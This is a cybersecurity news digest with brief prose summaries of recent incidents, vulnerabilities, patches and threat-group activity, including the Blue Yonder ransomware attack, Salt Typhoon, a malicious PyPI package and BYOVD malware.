Daily Brief

The Cybersecurity and Infrastructure Security Agency (CISA) has highlighted a critical flaw in Array Networks secure gateways, actively exploited. The vulnerability (CVE-2023-28461), with a severity rating of 9.8, facilitates unauthorized remote code execution. Firmware update has been issued (version 9.4.0.484) to plug the security gap. Chinese-linked cyber group, Earth Kasha, utilized this exploit in attacks targeting entities in Japan, Taiwan, India, and Europe. Recent campaigns also include employing the vulnerability to deploy backdoors in European diplomatic entities. Amidst these security concerns, U.S. federal agencies are urged to implement the patch by December 2024. Over 440,000 hosts globally could be vulnerable to similar attacks, underscoring the need for robust cybersecurity defenses and patch management.

Blue Yonder, a US-based supply chain SaaS vendor, suffered a ransomware attack on November 21, causing significant service disruption. The attack has directly affected the supply chain operations of major UK retailers like Morrisons and Sainsbury's, leading to difficulties in stocking shelves. Post-attack, Blue Yonder has been actively working with external cybersecurity experts to restore services and implement defensive measures. Affected systems include payroll and staff scheduling, with Starbucks reporting operational challenges, although sales continue. Morrisons and Sainsbury’s have implemented alternative processes to manage their supply chains amid ongoing disruptions. Blue Yonder is ensuring minimal impact on its US-based clients. The overall situation remains fluid with no clear recovery timeline, as continuous efforts are made to secure and reinstate full operations. The incident underscores the broader implications of cyber-attacks on essential service infrastructures and the ripple effect on dependent businesses and services.

QNAP released security updates addressing multiple vulnerabilities in its NAS and router software, including three critical severity issues. Critical flaws were patched in Notes Station 3 and QuRouter products, with the most severe being an OS command injection flaw in QuRouter impacting system control. The addressed vulnerabilities in Notes Station 3 are resolved in version 3.9.7, with users urged to update immediately. The QuRouter critical flaw, allowing remote command execution, was fixed in version 2.4.3.106. Additional fixes covered QNAP AI Core, QuLog Center, QTS, and QuTS Hero, with vulnerabilities rated between high to critical severity. QNAP emphasized the importance of updating devices promptly and recommended using VPNs to shield devices from direct internet exposure.

Blue Yonder, a Panasonic subsidiary, experienced a significant ransomware attack on November 21, 2024, impacting its supply chain services. The attack targeted Blue Yonder’s managed services hosting environment, leading to disruptions primarily affecting grocery store chains in the UK. Blue Yonder’s clientele includes major companies such as DHL, Renault, Bayer, Morrisons, Nestle, 3M, Tesco, Starbucks, Ace Hardware, Procter & Gamble, Sainsbury, and 7-Eleven. A spokesperson for UK grocery chain Morrisons confirmed that they reverted to slower backup processes due to the outage. Sainsbury's had contingency plans that helped mitigate the impact of the disruption. Blue Yonder and external cybersecurity experts are actively working on recovery strategies; however, no definite timeline for service restoration has been shared. Updates from Blue Yonder urge clients to stay informed through the customer update page as the situation evolves. As of the last update, there was no confession from any ransomware group for this specific attack.

Nicholas Michael Kloster, 31, from Kansas City, Missouri, has been indicted for hacking into computer networks of a health club and a nonprofit organization. Kloster allegedly used his unauthorized access to promote his cybersecurity services, claiming he could improve the security of the systems he had compromised. In one instance, Kloster emailed a gym owner, detailing his unauthorized access, and offered his services to secure their systems. He manipulated his gym membership fee, removed his photo from the gym's database, and took a staff member's name tag. Kloster posted evidence of his control over a gym's security system on social media. He also gained unauthorized access to a nonprofit, installing a VPN and altering account passwords, causing significant remedial costs. Kloister is further accused of using stolen credit card information to purchase equipment for hacking. The DOJ states Kloster could face up to 15 years in prison if convicted for his cybercrimes against multiple organizations.

Microsoft aims to prioritize security, introducing the Windows Resiliency Initiative following lessons learned from a significant incident in July involving a harmful security update from CrowdStrike. The new initiatives include enabling more applications and users to operate without administrative privileges, enforcing stricter controls on permissible apps and drivers, and bolstering identity protection to combat phishing. In response to previous vulnerabilities, Microsoft plans to reduce reliance on kernel-mode code which was central to the CrowdStrike incident, opting instead to allow vendors to operate more at the user mode level. A newly announced feature, Quick Machine Recovery, is set to be available for testing in early 2025, designed to aid administrators in reviving non-booting machines remotely. Microsoft commits to Safe Deployment Practices for security updates, ensuring they are deployed gradually and monitored to minimize negative impacts, set to start a private preview by July 2025. Another upcoming feature, Hotpatch in Windows, will enable critical security updates to be done without the need for system restarts, enhancing security management efficiency. Despite these advancements, some industry professionals believe these security improvements by Microsoft are overdue, highlighting past incidents that have exposed significant architectural weaknesses in Windows security management.

Chinese state-sponsored group Salt Typhoon utilized a new malware, GhostSpider, targeting telecommunication providers globally. GhostSpider, detected by Trend Micro, is designed for stealth and long-term espionage, functioning primarily in-memory. Salt Typhoon has compromised multiple U.S. telecom firms such as Verizon, AT&T, and T-Mobile, gaining access to sensitive government communications. U.S. authorities have recently informed 150 victims about breaches linked to Salt Typhoon's activities. The group also employs Masol RAT, Demodex, and SnappyBee backdoors for their cyber operations across various sectors including government, technology, and transportation. Notable campaigns include 'Alpha' targeting Taiwanese government and chemical industries, and 'Beta' focusing on Southeast Asian telecoms. Initial breaches are achieved by exploiting vulnerabilities in public-facing endpoints, followed by complex lateral movements within the networks. Trend Micro emphasizes the sophistication of Salt Typhoon and recommends robust, multi-layered cybersecurity defenses to protect against such threats.

Google has launched a new feature named Restore Credentials to ease user transition to new Android devices by securely restoring third-party app logins. The feature is integrated into Android’s Credential Manager API, eliminating the need to re-enter app login details manually during device migration. Restore Credentials operates by using a restore key that aligns with FIDO2 standards, such as passkeys, enabling automatic background authentication. The restore keys are stored locally and can be encrypted and saved to the cloud if the user has enabled cloud backup. Transitioning to a new device prompts the system to request restore keys from the cloud or local storage, automatically signing the user into their apps. Google advises app developers to generate a restore key post-user authentication and to delete it when the user signs out to prevent repetitive automatic log-ins. Similar features are already available in iOS, with security controls managed via the kSecAttrAccessible attribute in the iCloud Keychain. The announcement coincides with Google's release of the first Developer Preview of Android 16, demonstrating ongoing improvements in Android privacy and security features.

A malicious update to the Python library "aiocpa" was added to PyPI, designed to exfiltrate private crypto keys using a Telegram bot. Although the package was originally released in September 2024, signs of malicious activity surfaced in version 0.1.13. This version altered the "sync.py" script to decode and execute a highly obfuscated code after installation. The malicious code specifically captures the victim's Crypto Pay API token and transmits it using a Telegram bot. PyPI has placed the "aiocpa" package in quarantine to prevent further downloads and modifications. The discrepancy between the library’s GitHub repo, which remains clean, and the infected PyPI package indicates a possible attempt to evade detection. It remains uncertain whether the original developer updated the package with malicious intent or if their credentials were stolen. Cybersecurity experts highlight the necessity of verifying package source codes before installation, as attackers may exploit trust in previously secure packages.

Senator Mark R. Warner highlighted extensive cyber-attacks by Chinese operatives on US telecommunications systems, describing the situation as severe. The attacks on US telcos required potentially massive hardware replacements, including "thousands" of switches and routers. China's activities in this domain have been compared unfavorably to other major cyber incidents, such as the SolarWinds and Colonial Pipeline attacks, indicating a higher level of threat. Warner revealed these cyber-attacks had allowed for persistent access to US telco networks, suggesting that significant espionage and data theft could have occurred, including eavesdropping on calls. The ongoing vulnerability of US telecom infrastructure was emphasized, with Warner noting "The barn door is still wide open, or mostly open." The Biden administration convened a meeting with telecom executives to discuss these revelations and coordinate responses to the ongoing threats. The FBI and the US Cybersecurity and Infrastructure Security Agency had previously warned about the Beijing-backed hacking group, dubbed Salt Typhoon, involved in these operations. China denies these accusations, claiming the US fabricates such claims, yet offers no alternate explanations.

Phishing techniques have become increasingly sophisticated, evolving from simple scams to complex operations that bypass modern security measures. Attackers use methods such as the Luhn algorithm and micro-donations to verify stolen credit card details, enhancing the effectiveness of their scams. Modern phishing includes evasion tactics like randomizing URL folder structures and employing VMs that mirror victims' device profiles, complicating detection and tracking by defenders. Attackers adapt to security research methods by blocking IPs after single use and employing anti-proxy detection to maintain the illusion of site shutdown. Phishing attacks now exploit device information to bypass security protocols like device ID verification, posing significant challenges to organizational cybersecurity. Innovative redirection techniques in phishing scams involve multiple URL changes and use of decentralized web services to avoid traceability and hinder cybersecurity efforts. Cybercriminals continue to refine their evasion strategies, including using encoded scripts and exploiting legitimate web functionalities to mislead targets and researchers. Defenders are encouraged to persistently update their tactics and adapt to the evolving strategies of these sophisticated cyber adversaries, highlighting the ongoing cybersecurity battle.

Cybersecurity researchers identified new attacks targeting IaC (Infrastructure-as-Code) and PaC (Policy-as-Code) tools, specifically Terraform and OPA (Open Policy Agent). Attackers can insert malicious policies or configurations into these tools to exfiltrate sensitive data from cloud platforms. OPA’s Rego language allows policy enforcement across cloud environments, but attackers can misuse functions like "http.send" or "net.lookup_ip_addr" for data exfiltration. Terraform configurations, used in setting up cloud resources, can be abused using the "terraform plan" command in CI/CD processes to run malicious code. Tenable advises restricting risky functions and monitoring policies in OPA along with careful review of pull requests in Terraform’s GitHub workflows. Recommended preventative measures include the use of IaC scanning tools such as Terrascan and Checkov to identify misconfigurations before deployment. These vulnerabilities highlight the importance of only using trusted third-party resources and maintaining strong security oversight on policy and code configuration tools.

Liminal Panda, a China-nexus cyber espionage group, has been conducting targeted attacks on telecom entities in South Asia and Africa since 2020. The group employs sophisticated tools such as SIGTRANslator and CordScan to exploit telecommunications protocols and harvest substantial data, including mobile subscriber information and SMS messages. Concurrently, another Chinese-affiliated hacking group, Salt Typhoon, has targeted major U.S. telecom providers like AT&T, Verizon, and T-Mobile, aiming to infiltrate U.S. critical infrastructure. U.S. Cyber Command indicates these attacks may be preparations for significant geopolitical conflicts, highlighting the strategic importance of telecommunications networks. Recent disclosed CVEs reveal a broad array of critical vulnerabilities across various platforms and software, underscoring ongoing security risks in both commercial and personal technology environments. The technique of DNS sinkholing is highlighted as an effective cybersecurity tool, offering a proactive method to intercept and neutralize threats before they impact systems. The overall synthesis of the week's news points to the increasing complexity and stakes of global cybersecurity, emphasizing the necessity for vigilance and proactive defense strategies in digital infrastructures.

Cybersecurity researchers have identified a new malware that utilizes the Bring Your Own Vulnerable Driver (BYOVD) technique to circumvent antivirus protections. The malware deploys a legitimate Avast Anti-Rootkit driver (aswArPot.sys), which is altered to neutralize security functions and take control of the system. Initiated through an executable file named kill-floor.exe, this malware registers the corrupted driver as a service, achieving kernel-level system access. Once operational, the malware can terminate 142 various processes, many of which are essential for security software, thereby dodging detection mechanisms. Exploiting kernel-mode driver capabilities allows the malware to override user-mode processes and bypass most antivirus and Endpoint Detection and Response (EDR) systems' tamper protections. Details on how the malware is initially dropped onto systems and the extent of its distribution remain unclear. The technique of exploiting flawed, signed drivers has been increasingly adopted by attackers, especially in ransomware deployments. Researchers highlighted a previous incidence in May, involving the GHOSTENGINE malware that also manipulated the Avast driver to disable security processes.

Google's Threat Intelligence Group has identified and blocked over 1,000 websites linked to a network dubbed "Glassbridge," involved in spreading pro-China narratives. The blocked entities, including Shanghai Haixun Technology and three others, reportedly operate under a unified direction to publish thematically similar pro-PRC content. These domains posed as independent news outlets but were actually pushing content that aligns with the political interests of the People’s Republic of China. The content ranged from state-sponsored media and press releases to conspiracy theories and attacks on individuals, often mixed with more innocuous material. Digital PR firms linked to these operations provided a veneer of legitimacy, helping obscure the origins and coordination behind the content dissemination. Google's actions include removing these sites from Google News and Google Discover and terminating associated YouTube channels. Mandiant, a cybersecurity firm, had already flagged some of these domains in 2022 for similar deceptive practices. The shift from purely social media-based information operations to including newswires and fake news sites mirrors tactics seen in Russian and Iranian influence campaigns.